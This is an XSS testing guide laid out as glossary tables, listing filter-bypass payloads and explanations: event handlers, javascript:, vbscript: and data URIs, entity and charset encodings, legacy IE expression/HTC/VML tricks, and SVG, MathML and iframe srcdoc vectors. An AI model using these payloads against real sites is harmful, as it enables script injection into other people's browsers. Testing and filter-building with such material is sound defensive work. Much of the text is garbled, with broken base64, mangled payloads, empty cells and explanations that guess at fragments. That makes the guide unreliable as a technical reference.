Web Application Security Testing Guide: Cross-Site Scripting (XSS), Client-Side Attacks, and Payload Vectors
Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into content delivered to a user's browser. Understanding script context and injection points is critical for both attack and defense.
Important to know: The context determines what characters and syntax are needed to break out of existing HTML/JavaScript structures and execute arbitrary code.
| Term | Explanation |
|---|---|
| Script context | The environment where JavaScript code is executed – inside <script> tags, event handlers (onclick), javascript: URIs, or eval() contexts. Different contexts require different escape sequences. |
Important to know: Quote characters (" and ') are used to delimit string values in HTML attributes and JavaScript. Breaking out of quotes is the first step in many XSS attacks.
| Term | Explanation |
|---|---|
| quot | Quotation mark (") – used to close attribute values. Attackers inject " to break out of an attribute and then inject an event handler or new attribute. |
Important to know: Inline scripts are JavaScript code written directly inside <script> tags or event handler attributes (e.g., onclick="js code here"). They execute immediately when the page loads or when the event fires.
| Term | Explanation |
|---|---|
| inline-script | JavaScript code embedded directly in HTML rather than loaded from an external file. Example: <script>alert(1)</script> or <button onclick="alert(1)">. |
Important to know: HTML attributes (e.g., src, href, alt, title, style, event handlers) can be injection points. The required payload depends on whether the attribute is quoted, unquoted, or expects a URL.
| Term | Explanation |
|---|---|
| Attribute | HTML element properties like src, href, onclick, onload, style. Injecting into attributes requires closing the attribute and/or injecting new attributes. |
Important to know: The style attribute (and <style> tags) can contain JavaScript via expression() in older Internet Explorer (IE 7-10). This is a legacy vector but still relevant for legacy systems.
| Term | Explanation |
|---|---|
| style (IE) | In Internet Explorer, CSS expression() allows JavaScript execution. Example: style="x:expression(alert(1))". Removed in IE 11 and modern browsers. |
Important to know: The origin (protocol + domain + port) determines the Same-Origin Policy (SOP). XSS attacks often need to respect or bypass origin restrictions when stealing data or making cross-origin requests.
| Term | Explanation |
|---|---|
| Origin | The combination of protocol (http/https), domain (example.com), and port (80/443). XSS executes in the context of the origin where the vulnerable page exists. |
Important to know: Sometimes you cannot directly inject a new tag. You must use a prior tag (existing element) to host your payload by adding attributes or modifying its behavior.
| Term | Explanation |
|---|---|
| Prior tag | An existing HTML tag that can be repurposed to execute JavaScript. For example, injecting onload into an existing <img> tag. |
Important to know: The surrounding HTML/JavaScript context determines what characters need escaping. Contexts include: HTML body, HTML attribute, JavaScript string, JavaScript template literal, CSS, URL, and event handler.
| Term | Explanation |
|---|---|
| Context | The syntactic environment where user input is placed. Different contexts require different escaping rules. |
Important to know: Some tags are "magic" because they have special properties that allow XSS even with strict filters. Examples: <svg>, <math>, <iframe>, <object>, <embed>.
| Term | Explanation |
|---|---|
| Magic tag y | Tags that automatically create JavaScript execution contexts (e.g., <svg onload=alert(1)>, <math> namespace). |
Important to know: A trigger is the event or condition that causes the injected JavaScript to execute. Common triggers: page load (onload), user interaction (onclick, onmouseover), or timers (setTimeout).
| Term | Explanation |
|---|---|
| Trigger | The event that activates the XSS payload. Examples: onload, onerror, onclick, onfocus, onmouseenter. |
Important to know: Special characters break out of string delimiters and HTML structures. These include: <, >, ", ', &, \, /, =, (, ), ;, {, }, [, ], %, +, #.
| Term | Explanation |
|---|---|
| Special char | Characters with syntactic meaning in HTML, JavaScript, or URLs. They must be encoded or escaped to be treated as literal characters. |
Important to know: Character encoding mismatches (e.g., UTF-7, GBK, ISO-2022-JP) can bypass filters that only check ASCII characters. UTF-7, in particular, allows <script> to be encoded as +ADw-script+AD4-.
| Term | Explanation |
|---|---|
| Special charset | Using alternative character encodings to bypass input filters. Example: UTF-7 +ADw-script+AD4-alert(1)+ADw-/script+AD4- becomes <script>alert(1)</script>. |
Important to know: "Found" refers to the discovery of an injection point during reconnaissance. Automated scanners may find potential vectors; manual testing confirms exploitability.
| Term | Explanation |
|---|---|
| Found | Indicates that an injection point has been discovered. The tester must now determine the exact context and working payload. |
Important to know: Input refers to any user-controllable data that is reflected or stored by the application: URL parameters, form fields, HTTP headers (User-Agent, Referer), cookies, localStorage, postMessage data, etc.
| Term | Explanation |
|---|---|
| Input | Any user-supplied data that the application processes and outputs. All inputs are potential XSS vectors. |
Important to know: JavaScript is the execution language for XSS. Understanding JavaScript syntax (strings, functions, objects, prototype chain, template literals, tagged templates) is essential for crafting advanced payloads.
| Term | Explanation |
|---|---|
| Javascript | The programming language executed in the browser. XSS payloads are written in JavaScript. |
Important to know: Different triggers cause JavaScript execution in different ways. The table below lists specific payload variations.
| Trigger | Explanation |
|---|---|
| alert(1) | Basic proof-of-concept payload that displays an alert box. Used to confirm XSS exists. |
| -alert()} | A closing/opening sequence to break out of existing JavaScript and inject new code. |
| \u{000000000000006 1 Hert(1)} | Unicode escape sequence injection. \u{...} is a Unicode code point escape in ES6. The original appears malformed but represents obfuscation attempts. |
| setTimeout(name) | setTimeout() can execute a string as JavaScript. If name is a variable containing a malicious string, it executes. |
| valueOf:location, toString: | Overriding valueOf and toString methods on objects can trigger execution when the object is coerced to a string or number. |
| [].pop,0:/javascript:alert%281%29/.source,length:1} (IE) | Array prototype manipulation combined with regex source to hide JavaScript URI. %281%29 is URL-encoded (1). |
| eat backlash: %bb"alert(1) (GBK charset) | GBK (Chinese) character encoding bypass. %bb" becomes a quote in GBK but not in ASCII, allowing injection. |
| quot | Quotation mark injection to break attribute values. |
Important to know: Breaking out of the current context is necessary when input is inside an existing HTML/JavaScript structure. Use --> to close HTML comments, </script> to close script tags, > to close HTML tags.
| Term | Explanation |
|---|---|
| Break | Characters or sequences that close the current HTML/JavaScript context, allowing new injection. Examples: ">, '>, </script>, -->, ]>, }. |
Important to know: This is a specific injection sequence. It closes an attribute (stc="), uses --> to close an HTML comment, closes the <script> tag, and then injects an <svg> tag with an event handler.
| Term | Explanation |
|---|---|
| after: stc="—-></script><svg/ | Example injection string: stc="—-></script><svg/ closes attribute, closes comment, closes script tag, opens SVG tag. |
Important to know: This refers to injecting XSS via the q (query) parameter into an <img> tag context. Many search engines use ?q=query.
| Term | Explanation |
|---|---|
| Q pa img | Injection targeting an <img> tag via a query parameter named q. |
Important to know: An onload payload specifically for Internet Explorer (SEE IE = works in IE). The //"> comments out or closes remaining characters to prevent syntax errors.
| Term | Explanation |
|---|---|
| SEE IE onload=alert(1)//"> | IE-specific payload where onload=alert(1) triggers when image loads, and //"> comments out the rest. |
Important to know: A single-parameter injection that works when input is reflected inside an <img src> attribute. The payload closes the src attribute, injects an event handler, and comments out trailing characters.
| Term | Explanation |
|---|---|
| Single param vector: <img src="-- 1)//'>< | —<script> |
Important to know: Line break characters (newline \n (10), carriage return \r (13), line separator (8232), paragraph separator (8233)) can be used to break out of JavaScript strings without breaking the overall syntax. The // comments out the rest of the line.
| Term | Explanation |
|---|---|
| //{10,13,8232,8233]alert(1)// | Using Unicode line separators (U+2028, U+2029) to break string context while keeping code valid. |
Important to know: This appears to be a malformed or truncated payload. Likely refers to injection inside HTML comments (<!-- -->) where closing the comment (-->) is required before injecting JavaScript.
| Term | Explanation |
|---|---|
| comment Silert( IVE | Injection within HTML comments. Close comment with --> then inject script. "Silert" may be a typo for alert. |
Important to know: @cc_on is a conditional compilation feature in Internet Explorer (IE 4-10). It executes JavaScript code inside /*@cc_on ... @*/ comments. Only IE interprets these as executable code.
| Term | Explanation |
|---|---|
| /*@cc_on-alert(1)) //@cc_on-alert(1)) | IE conditional compilation. Code inside @cc_on executes only in IE, bypassing other browsers. |
Important to know: The autofocus attribute automatically focuses an element (like <input>). When combined with onfocus=alert(1), the alert triggers as soon as the element receives focus, without user interaction.
| Term | Explanation |
|---|---|
| "autofocus/onfocus=alert(1)// | Payload for input fields. autofocus triggers onfocus immediately, executing alert(1). |
Important to know: The oncut event fires when the user cuts text (Ctrl+X or right-click → Cut). This requires user interaction but is less common than onclick, so may bypass filters.
| Term | Explanation |
|---|---|
| "oncut=alert(1)// | Event handler for cut action. Executes when user cuts text from the element. |
Important to know: The onclick event fires when the user clicks on the element. This is a common but reliable trigger that requires user interaction.
| Term | Explanation |
|---|---|
| 'onclick=alert(1)// | Standard onclick payload. User must click the element to trigger. |
Important to know: Internet Explorer has specific breaking sequences that don't work in other browsers. For example, IE allows certain control characters to break out of strings.
| Term | Explanation |
|---|---|
| Break (IE) | IE-specific break characters, such as null bytes (%00), line breaks, or certain Unicode characters that other browsers sanitize. |
Important to know: This shows injection inside a JavaScript function call within an onclick handler. The ' is an HTML entity for apostrophe ('). The attacker closes the string, injects alert(1), and comments out the rest.
| Term | Explanation |
|---|---|
| onclick="delFeedback('2&apos) alert(1)//')" | Injecting into a JavaScript function parameter. &apos (missing semicolon) attempts to break string. |
Important to know: Similar to above, but using " (HTML entity for double quote). The payload breaks out of the string and injects JavaScript.
| Term | Explanation |
|---|---|
| onclick='addUser("238")alert( wry | Injection using HTML entity encoding. " becomes ", breaking the string. "wry" may be truncated wry part of window. |
Important to know: This injects a comment (#) or uses a numeric entity, then closes a parenthesis, adds an alert, and comments out the remainder.
| Term | Explanation |
|---|---|
| onclick='addUser("238#000000000034)-alert(1)//")" | Complex injection with numeric sequence, closing parentheses, and comment. |
Important to know: This uses VBScript (Internet Explorer only) with language=vbs attribute. The backslash escapes the quote, allowing &alert(1) to be concatenated. & is string concatenation in VBScript.
| Term | Explanation |
|---|---|
| add | VBScript injection. language=vbs enables VBScript in IE. & concatenates strings, executing alert(1). |
Important to know: HTML entities like < (<), > (>), " ("), ' ('), & (&) can bypass filters that look for raw characters. Some parsers decode entities multiple times (double decoding).
| Term | Explanation |
|---|---|
| Named HTML entities | Using &name; format entities to represent characters. Example: <script> becomes <script> after decoding. |
Important to know: Octal encoding (base 8) can represent characters as \### (e.g., \74 for <). This is less common but may bypass filters that only check hexadecimal or decimal.
| Term | Explanation |
|---|---|
| Oct | Octal encoding of characters. Example: \74script\76 becomes <script>. |
Important to know: VBScript is a Microsoft scripting language supported only in Internet Explorer (versions up to IE 11 but deprecated). Attackers use vbscript:MsgBox(1) instead of javascript:alert(1) for IE-specific XSS.
| Term | Explanation |
|---|---|
| VBScript (IE <= 9) | VBScript execution via vbscript: URIs. Example: vbscript:MsgBox+1. Works only in older IE. |
Important to know: URL encoding (% followed by two hex digits) represents special characters. Attackers use URL encoding to bypass filters that don't decode input before checking.
| Term | Explanation |
|---|---|
| URL encode | Percent-encoding: %3C = <, %3E = >, %22 = ", %27 = '. |
Important to know: The javascript: URI scheme executes JavaScript when used in href, src, or action attributes. The %28 and %29 are URL-encoded parentheses ( and ).
| Term | Explanation |
|---|---|
| javascript:alert%281%29 | javascript: URI with URL-encoded parentheses. Becomes javascript:alert(1) after decoding. |
Important to know: "Adv: peers" likely refers to advanced techniques or peer-to-peer vectors. May be a note about WebRTC or peer connections that can be exploited.
| Term | Explanation |
|---|---|
| Adv: peers " | Advanced technique involving WebRTC or peer-to-peer data channels that may bypass traditional XSS filters. |
Important to know: : is an HTML entity for colon (:). Filters looking for javascript: may miss javascript: because the colon is encoded. After HTML decoding, it becomes javascript:.
| Term | Explanation |
|---|---|
| javascript:alert(1) | HTML entity encoding of the colon in javascript: URI scheme. Bypasses literal string matching. |
Important to know: &newLine; is an HTML entity for newline (not standard in all parsers). Inserting newlines or tabs between javascript and : can bypass filters that expect no whitespace.
| Term | Explanation |
|---|---|
| &newLine;javascript:alert(1) | Using HTML entity for newline to break up javascript: while still being valid after decoding. |
Important to know: ( and ) are HTML entities for left and right parentheses. This bypasses filters looking for literal ( and ) characters.
| Term | Explanation |
|---|---|
| javascript:alert(1 ) | Parentheses encoded as HTML entities. After decoding: javascript:alert(1). |
Important to know: This uses decimal HTML entities (&#number;) with leading zeros. The zeros may bypass length or pattern filters. The payload is likely javascript: broken into pieces.
| Term | Explanation |
|---|---|
| Java8 1 5;cri ptname | Decimal HTML entity injection with excessive leading zeros. May decode to javascript. |
Important to know: Hexadecimal HTML entities (&#x...;) with excessive leading zeros. The s is 's' (ASCII 115). Combined with java becomes javascript.
| Term | Explanation |
|---|---|
| javascri ptname | Hex HTML entity with leading zeros. s = 's'. java + 's' = javas. Then cript completes javascript. |
Important to know: Data URIs (data:) embed content directly in the URL. Base64-encoded HTML will be rendered by the browser. This payload decodes to <script>alert(1)</script>.
| Term | Explanation |
|---|---|
| data:text/html;base64,PHNicmlwdDShbGV ydCgxkTwvc2NyaXBOPg== | Data URI with Base64-encoded HTML. Decodes to <script>alert(1)</script>. Works in <iframe src="data:..."> and other contexts. |
Important to know: Spaces inside tag names (<sc rip t>) can bypass naive filters that look for exact <script>. Browsers ignore spaces in tag names (HTML5 is lenient).
| Term | Explanation |
|---|---|
| data:text/html,< sc rip t >alert(1)</sc rip t> | Spaces inserted inside <script> tag name. Browser ignores spaces and executes as <script>. |
Important to know: The data:), prefix is a minimal valid data URI. data:), means MIME type is empty (or defaults to text/plain), but browsers often still render HTML. This is a compact obfuscation.
| Term | Explanation |
|---|---|
| data:),<script>alert(1)</script> | Minimal data URI prefix. data:), followed directly by HTML. Shorter and may bypass filters expecting data:text/html. |
Important to know: Additional named entity vectors. Named entities can be used anywhere in HTML attributes.
| Term | Explanation |
|---|---|
| Named | Named HTML entities (continued). Comprehensive list includes < <, > >, " ", ' ', & &. |
Important to know: The javascript: URI scheme is one of the most powerful XSS vectors. It can be used in href, src, action, and even formaction attributes.
| Term | Explanation |
|---|---|
| JS URI | javascript:alert(1) executed when the browser navigates to that URI (e.g., clicking an <a href="javascript:alert(1)"> link). |
Important to know: HTML entities can be numeric (decimal A = 'A', hexadecimal A = 'A') or named (Á). They are decoded before parsing, making them effective for bypass.
| Term | Explanation |
|---|---|
| HTML entities | General entity encoding. Can encode any character. Attackers encode <, >, ", ', and even entire JavaScript code. |
Important to know: Base64 encoding converts binary data to ASCII. Data URIs commonly use base64 to embed binary or text content. Attackers base64-encode HTML/JavaScript to avoid special characters.
| Term | Explanation |
|---|---|
| base64 | Base64 encoding scheme. Example: <script>alert(1)</script> base64 = PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==. |
Important to know: Whitespace characters (space, tab, newline, carriage return, form feed) are often ignored by parsers but can break filter regex that expects no spaces. Use %09 (tab), %0a (newline), %0c (form feed), %0d (carriage return), %20 (space).
| Term | Explanation |
|---|---|
| whitespace | Tab \t, newline \n, carriage return \r, form feed \f, space . Insert between javascript and : to bypass filters. |
Important to know: Firefox has specific behavior with data URIs. Some data URI variations work in Firefox that don't work in Chrome/Edge, and vice versa. Firefox allows data:application/javascript,alert(1).
| Term | Explanation |
|---|---|
| DATA URI (Firefox) | Firefox-specific data URI handling. Example: <iframe src="data:application/javascript,alert(1)"> works in Firefox. |
Important to know: If a data URI has an invalid or missing MIME type, browsers may still render the content. For example, data:x/x,<script>alert(1)</script> – x/x is not a real MIME type, but some browsers fall back to HTML.
| Term | Explanation |
|---|---|
| Invalid mime-type | Using a fake or malformed MIME type to confuse filters while the browser still executes the content. |
Important to know: Data URI specifying UTF-8 charset. This is a legitimate, non-malicious example but demonstrates the structure. Attackers replace <h1>abc with <script>alert(1)</script>.
| Term | Explanation |
|---|---|
| data:text/html;charset=utf-8, | Valid data URI with charset specification. Shows the format: data:[MIME][;charset],[content]. |
Important to know: Obfuscated data URI with : (colon HTML entity), URL-encoded slashes %2f%2f (//), spaces, and broken base64 string. This is a highly obfuscated payload designed to bypass multiple filter layers.
| Term | Explanation |
|---|---|
| data:%2f%2f;ba se64;;//,P HNicmiw dD5hbG VydC gxKTwvc2NyaXBOPg= = | Heavy obfuscation: HTML entity colon, URL-encoded slashes, random spaces, double semicolons, fragmented base64. |
Important to know: VBScript equivalent of javascript:alert(1). MsgBox is VBScript's alert function. Works in IE (up to version 10). Spaces and + are used for obfuscation.
| Term | Explanation |
|---|---|
| vbscript:Msgbox+1 | VBScript URI scheme. MsgBox+1 shows a message box. + is used instead of space. |
Important to know: The charset parameter in data URIs or meta tags can cause encoding-based bypass. For example, forcing UTF-7 or GBK encoding can make otherwise filtered characters become significant.
| Term | Explanation |
|---|---|
| charset | Character set specification. Changing charset can reinterpret bytes, turning harmless characters into quotes or angle brackets. |
Important to know: Mixing multiple encoding techniques (HTML entities, URL encoding, base64, UTF-7, line breaks) creates "polyglot" payloads that bypass sequential filters.
| Term | Explanation |
|---|---|
| mix | Combining multiple encoding and obfuscation techniques in a single payload to bypass layered defenses. |
Important to know: VBScript URIs (vbscript:) are supported in Internet Explorer versions up to 10 (deprecated in IE 11). They execute VBScript code in the context of the page.
| Term | Explanation |
|---|---|
| VBScript URI (IE <= 10) | vbscript:MsgBox(1) executes VBScript. Can be used in <a href="vbscript:...">, <iframe src="vbscript:...">, etc. |
Important to know: This is an IE-specific vector using CSS behavior property (HTC files). #default#AnchorClick is a default behavior in IE. The folder attribute (non-standard) with javascript: URI triggers execution.
| Term | Explanation |
|---|---|
| click (IE <= 8) | IE proprietary behavior CSS property. Executes javascript: in the folder attribute when the behavior loads. |
Important to know: This is an HTC (HTML Component) file saved as xss.txt. The <scriptlet> tag and <implements type="behavior"> define a behavior. When applied via CSS behavior:url(xss.txt), the script executes.
| Term | Explanation |
|---|---|
| xss.txt: <implements type="behavior'/> <script>alert(1)</script> | Content of an HTC behavior file. Applies script to any element that references this behavior. |
Important to know: Applying an external behavior file (HTC) via CSS behavior property. The xss.txt file contains the <scriptlet> payload. Works in IE versions that support HTC (up to IE 10).
| Term | Explanation |
|---|---|
| (IE <= 10) | Input element with CSS behavior pointing to malicious HTC file. The script in xss.txt executes in the context of the page. |
Important to know: This is a highly complex IE-only vector using Vector Markup Language (VML). VML was a Microsoft vector graphics format (deprecated). The <line> element with xmlns VML namespace, behavior:url(#default#vml), and href=javascript:alert(1) executes JavaScript when the line is rendered.
| Term | Explanation |
|---|---|
| 1 (IE <= 9) | VML vector graphic injection. href=javascript:alert(1) on VML element executes script. |
2.49 1<vmiframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml); position:absolute;width:100%;height:100% (IE <=9)
Important to know: Another VML vector using <vmiframe> (VML iframe). The tag appears truncated in original, but the concept is injecting a VML iframe element that loads a malicious URL or executes JavaScript via href.
| Term | Explanation |
|---|---|
| 1<vmiframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml); position:absolute;width:100%;height:100% (IE <=9) | VML iframe injection. Incomplete payload in original, but demonstrates VML namespace abuse. |
Important to know: This is an IE CSS expression payload but with obfuscation. expression() in IE allowed JavaScript. Here /**/ is a CSS comment, ression is a split of expression, and (N)exp\' continues obfuscation.
| Term | Explanation |
|---|---|
| font-family:a/**/ression(alert(1)) (N)exp' ) | Obfuscated CSS expression. /**/ comment breaks keyword detection. Split expression across multiple parts. |
Important to know: Multiple obfuscation techniques for CSS expression: splitting the word, using escape sequences (\65 = 'e'), and separating with spaces/newlines.
| Term | Explanation |
|---|---|
| font-family:expression(alert) (1) expr\65 ssion(alert(1)) | \65 is hex escape for 'e'. expr\65 ssion becomes expression. Bypasses filters looking for exact expression. |
Important to know: Template-like payload where {tag} is replaced with an actual tag name. This shows tag nesting and injection inside name attribute. SfC is likely src with typos. onerror=alert({{i}) executes when image fails to load.
| Term | Explanation |
|---|---|
| {tag}<img name="{/tag} <img SfC=Xx:x onerror=alert({{i})//'> | Parameterized payload. {tag} placeholder. Injects <img> with invalid src (Xx:x) causing onerror to trigger. |
Important to know: Payload that uses an HTML comment (<!--) to hide part of the injection. The comment closes later, allowing the <img> tag to be parsed. This bypasses filters that strip content inside comments.
| Term | Explanation |
|---|---|
| {tag} | HTML comment wrapping. The <!-- and --> encapsulate the {/tag} while allowing <img> to execute. |
Important to know: <xmp> is an obsolete HTML tag that renders content as preformatted text without parsing HTML inside. However, IE has a bug where closing <xmp> and injecting after it still executes. The %> is a closing tag for ASP/embedded code.
| Term | Explanation |
|---|---|
| <xmp><% </xmp><img alt="%></ xmp><img src=xx:x onerror=alert(1)//'> (IE <= 9) | IE-specific <xmp> tag bug. Closes the xmp block, injects <img> with onerror. |
Important to know: SVG elements can have event handlers like onload. The [9,10,12,13,32,47] are ASCII codes for whitespace and slash characters: tab (9), newline (10), form feed (12), carriage return (13), space (32), slash (47). These can be inserted between svg and onload to bypass filters.
| Term | Explanation |
|---|---|
| <svg[9,10,12,13,32,47]onload=alert(1)> | Whitespace and slash characters between <svg and onload. Browser tolerates them. |
Important to know: CSS behavior property (IE only) allows attaching HTC behaviors. This is a powerful XSS vector in older IE versions.
| Term | Explanation |
|---|---|
| behavior | IE CSS property: behavior:url(xss.htc) executes JavaScript from external HTC file. |
Important to know: This is an XML data island (IE only). The <xml> tag defines an XML data block. Inside, a <rect> VML shape with onmouseover executes JavaScript when the mouse hovers over the area. strokeweight is likely a typo for strokeweight.
| Term | Explanation |
|---|---|
| Ymlxml: | IE XML data island with VML rect. onmouseover triggers alert. |
Important to know: A fuzz vector is a test string containing many potentially dangerous characters and patterns. It's used in automated fuzzing to discover injection points and filter bypasses.
| Term | Explanation |
|---|---|
| Fuzz vector | A test payload containing common XSS patterns, special characters, encodings, and tag structures. Example: "<script>alert(1)</script>'" |
Important to know: The "Result" is the observed output after injecting a payload. For XSS testing, you look for: script execution, reflection of input without encoding, broken HTML, error messages, or altered DOM.
| Term | Explanation |
|---|---|
| Result | The browser's response or behavior after payload injection. Successful XSS shows alert, console log, or DOM manipulation. |
Important to know: This is Chinese for "tag name terminator". Characters that close an opening HTML tag: >, space, tab, newline, carriage return, form feed, slash (/ for self-closing tags).
| Term | Explanation |
|---|---|
| 标签名结束符 | Characters that end the tag name portion of an HTML tag, allowing attributes or closing the tag. |
Important to know: The <img> tag is one of the most common XSS vectors because it has onload, onerror, onmouseover, and many other event handlers. It also has src that can be manipulated.
| Term | Explanation |
|---|---|
| <img | Opening tag of image element. Example payload: <img src=x onerror=alert(1)>. |
Important to know: Attribute separators are whitespace characters (space, tab, newline) that separate tag name from attributes, and separate multiple attributes. The numbers 10 (LF), 12 (FF), 13 (CR), 32 (space) are ASCII codes for valid separators.
| Term | Explanation |
|---|---|
| 属性分隔符 | Characters that separate HTML attributes. Browsers accept many whitespace characters. em may be a typo for [10,12,13,32]. |
Important to know: A payload where an attribute named XSS is injected with a value that closes the tag (">) and then injects a new <img> tag. The // comments out any trailing characters.
| Term | Explanation |
|---|---|
Injecting into an existing tag's attribute. The value "><img src=x onerror=alert(1)// closes the attribute and tag, then creates a new img. |
Important to know: The alt attribute of an <img> tag. If the alt value is reflected without proper encoding, the attacker can close the alt attribute and inject onload. The * may be a placeholder or comment.
| Term | Explanation |
|---|---|
| alt="*onload=alert(1) | Injection into alt attribute. Closes the attribute (with ") and adds onload=alert(1). |
Important to know: A complex payload that injects multiple attributes: name, onerror, href, and onclick. The [0x0b] is a vertical tab character (ASCII 11). The // comments out the remainder.
| Term | Explanation |
|---|---|
| alt='"" name='onerror=alert()//' href=[0x0b]" onclick=alert(1)// | Multiple attribute injection. Uses single quotes, double quotes, vertical tab, and comments. |
Important to know: This exploits a parsing bug in older IE (6-8) where the browser misinterprets malformed tags. The <x '="foo"> is invalid HTML but IE parses it in a way that allows the subsequent <img> to be injected.
| Term | Explanation |
|---|---|
| <x '="foo"> (IE 6-8) | IE-specific parsing bug. Invalid attribute names ('="foo") confuse IE parser, allowing script execution. |
Important to know: This payload injects a complete <script> tag inside the value attribute of an <input> field. If the value attribute is rendered as HTML (not text/plain), the <script> tag will execute. The * may be a placeholder.
| Term | Explanation |
|---|---|
| <input value="<script>alert(1)</script>"* /> | Nested tag injection. <script> inside value attribute. Requires the browser to parse the value as HTML (rare but possible in some contexts). |
Important to know: The value portion of an HTML attribute (e.g., src="value"). Injection into attribute values requires breaking out of quotes or using event handlers within the attribute.
| Term | Explanation |
|---|---|
| 属性值 | The content between quotes in an attribute. Example: onclick="alert(1)" – alert(1) is the attribute value. |
Important to know: The name portion of an HTML attribute (e.g., src, href, onclick). If an attacker can inject an attribute name, they can inject an event handler like onerror.
| Term | Explanation |
|---|---|
| 属性名 | The attribute identifier. Example: src, href, onload, onerror. |
4.1 <param name=movie
Important to know: The <object> tag embeds external resources (Flash, PDF, etc.). The data attribute points to the external file. <param name=movie> is used for Flash parameters. Attackers point to malicious SWF files that execute JavaScript via Flash's getURL or ExternalInterface.
| Term | Explanation |
|---|---|
| <param name=movie | Object tag loading external Flash file. The Flash file can execute JavaScript in the page context. |
4.2 Object (General)
Important to know: The <object> tag is a powerful XSS vector when it loads Flash, Silverlight, PDF, or other plugin content that can execute script. Mitigations: allowScriptAccess=never, sandbox attribute.
| Term | Explanation |
|---|---|
| Object | HTML element for embedding external objects. Can be exploited via malicious plugin content. |
4.3 <script xlink:href=data:,alert(1)></script>
Important to know: SVG (Scalable Vector Graphics) allows <script> tags. The xlink:href attribute can load an external script using the data: URI scheme. data:,alert(1) is a data URI containing JavaScript code.
| Term | Explanation |
|---|---|
| <script xlink:href=data:,alert(1)></script> | SVG script tag with external data: URI. Executes alert(1) from the data URI. |
4.4 <script>MsgBox'1'</script> (IE <= 10)
Important to know: SVG allows specifying script language via contentScriptType. Setting it to text/vbs enables VBScript inside <script> tags. Works only in IE.
| Term | Explanation |
|---|---|
| <script>MsgBox'1'</script> (IE <= 10) | SVG with VBScript. contentScriptType=text/vbs changes script language from JavaScript to VBScript. |
4.5 <script>alert(1)</script>
Important to know: SVG script tag with HTML entity encoded parentheses. After decoding, it becomes alert(1). This bypasses filters looking for literal ( and ) characters.
| Term | Explanation |
|---|---|
| <script>alert(1)</script> | Parentheses encoded as HTML entities ( and ). Works in SVG context. |
4.6 </ y="><x" onload=alert(1)>
Important to know: Malformed SVG syntax. The </ y="> is invalid but may be tolerated by browsers. The onload on the <x> tag (which becomes an SVG element) executes.
| Term | Explanation |
|---|---|
| </ y="><x" onload=alert(1)> | Malformed SVG injection. Closing tag with space and quote breaks parser, but onload on <x> still works. |
4.7 <style>*{font-family:'';}</style>
Important to know: CSS injection inside SVG. The font-family property value contains a string that includes <svg onload=alert(1)>. When the CSS is parsed, the <svg> tag inside the string may be interpreted as HTML? This is a complex vector where CSS parser and HTML parser interact.
| Term | Explanation |
|---|---|
| <style>*{font-family:'';}</style> | Nested SVG injection. <svg> tag inside CSS string may cause execution. |
4.8
Important to know: MathML (Mathematical Markup Language) is an XML standard for math. MathML elements support xlink:href which can contain javascript: URIs. This executes script when the math element is rendered.
| Term | Explanation |
|---|---|
MathML element with xlink:href pointing to javascript: URI. |
4.9
Important to know: MathML <a> tag (anchor) with xlink:href. Clicking the link executes the JavaScript.
| Term | Explanation |
|---|---|
MathML hyperlink with javascript: URI. |
4.10 <style>*{font-family:'<img/src=xx:x onerror=alert(1)>'}</style>
Important to know: Similar to SVG CSS injection, but in MathML. The font-family string contains an <img> tag with onerror. The CSS parser may cause HTML parsing of the string content.
| Term | Explanation |
|---|---|
| <style>*{font-family:'<img/src=xx:x onerror=alert(1)>'}</style> | MathML style injection. <img> tag inside CSS font-family string. |
4.11 SVG (General)
Important to know: SVG is a rich XSS vector because it supports scripts, event handlers, external resources, CSS, and animations. Many filters do not properly sanitize SVG.
| Term | Explanation |
|---|---|
| SVG | Scalable Vector Graphics. Supports <script>, event handlers (onload, onclick), and CSS expressions. |
4.12 Math (MathML)
Important to know: MathML is an under-tested vector for XSS. Many filters do not consider MathML tags as dangerous, but they support xlink:href and CSS.
| Term | Explanation |
|---|---|
| Math | MathML (Mathematical Markup Language). Supports xlink:href, event handlers, and CSS. |
PART 5: LINK, IFRAME, EMBED, AND BASE TAGS
5.1 Access-Control-Allow-Origin:*
Important to know: This is a CORS (Cross-Origin Resource Sharing) header. Access-Control-Allow-Origin: * allows any website to read the response. XSS combined with permissive CORS can steal sensitive data from the target origin.
| Term | Explanation |
|---|---|
| Access-Control-Allow-Origin:* | CORS header allowing all origins. XSS can use fetch() with credentials: 'include' to read responses. |
5.2
Important to know: HTML Imports (deprecated, originally in Chrome) allowed importing an HTML document into another. The imported document could contain scripts that execute in the importing page's context.
| Term | Explanation |
|---|---|
HTML Import. Loads external HTML, which can contain <script> that executes in the current page. |
5.3 echo '<svg/onload=alert(1)>' (Server-side reflection)
Important to know: This is a note about server-side reflection: if the server echoes '<svg/onload=alert(1)>' without encoding, it creates an XSS vulnerability. The echo command in PHP/other languages.
| Term | Explanation |
|---|---|
| echo '<svg/onload=alert(1)>' | Example of unsafe server-side reflection. The server outputs unencoded XSS payload. |
5.4 Link (General)
Important to know: The <link> tag can be used for CSS (rel=stylesheet), imports (rel=import), preloads, etc. Each can be abused for XSS or information leakage.
| Term | Explanation |
|---|---|
| Link | HTML <link> tag. Can load external resources that may execute scripts (e.g., SVG as CSS background with expression). |
5.5 <link rel=stylesheet href=data:, * %7bx:expression(write(1)) R7d> (IE)
Important to know: CSS via data URI with IE expression(). The * { x: expression(write(1)) } is a CSS rule that executes JavaScript when the page is rendered. R7d> may be truncation.
| Term | Explanation |
|---|---|
| <link rel=stylesheet href=data:, * %7bx:expression(write(1)) R7d> (IE) | IE CSS expression via data URI. %7b = {, %7d = }. Executes write(1). |
5.6 Adv: <iframe srcdoc="<iframe
Important to know: The srcdoc attribute of <iframe> allows specifying inline HTML content. Attackers inject HTML with nested iframes or scripts. The < is an HTML entity for <.
| Term | Explanation |
|---|---|
| Adv: <iframe srcdoc="<iframe | Advanced technique: srcdoc attribute with encoded HTML. The iframe renders the decoded HTML. |
5.7 Iframe (General)
Important to know: <iframe> is a powerful XSS vector. It can load external pages, execute scripts via srcdoc, execute javascript: URIs in src, and access the parent page if same-origin.
| Term | Explanation |
|---|---|
| Iframe | Inline frame. Can load data:, javascript:, or external URLs. srcdoc attribute contains HTML. |
5.8 <iframe srcdoc='<svg onload=alert(1) >'>
Important to know: Double-encoding: &lt; decodes to <, then to <. The payload becomes <svg onload=alert(1)>. This bypasses filters that decode only once.
| Term | Explanation |
|---|---|
| <iframe srcdoc='<svg onload=alert(1) >'> | Double HTML entity encoding. &lt; → < → <. Bypasses single decoding filters. |
